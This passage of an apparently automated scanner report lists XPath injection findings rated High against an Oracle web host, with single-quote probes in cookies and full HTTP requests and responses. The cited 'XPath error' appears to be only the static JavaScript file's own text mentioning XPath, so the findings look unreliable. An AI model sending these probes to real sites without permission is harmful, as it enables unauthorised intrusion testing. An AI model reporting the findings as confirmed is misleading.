Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The gpw_e24 cookie appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the gpw_e24 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%2527; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:27 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=36;ecid=49938291012375918,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.7. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js?1%2527=1 HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:26:16 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=300+0;age=0;ecid=49403138087297606,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.8. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_cur_URL cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The p_cur_URL cookie appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the p_cur_URL cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233%2527; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 10:09:57 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=23;ecid=49401733632975001,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.9. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_lang cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The p_lang cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the p_lang cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US'; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:27 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=24;ecid=49937238745376215,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.10. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_org_id cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The p_org_id cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the p_org_id cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001'; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:23:05 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=99;ecid=49714579050815798,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.11. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The s_cc cookie appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the s_cc cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true%2527; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:23:05 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=108;ecid=49715287720427927,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.12. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_nr cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The s_nr cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_nr cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522'; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:27 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=22;ecid=49937101306421007,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.13. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_nr6 cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The s_nr6 cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_nr6 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New'; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:27 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=21;ecid=49937002522171970,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
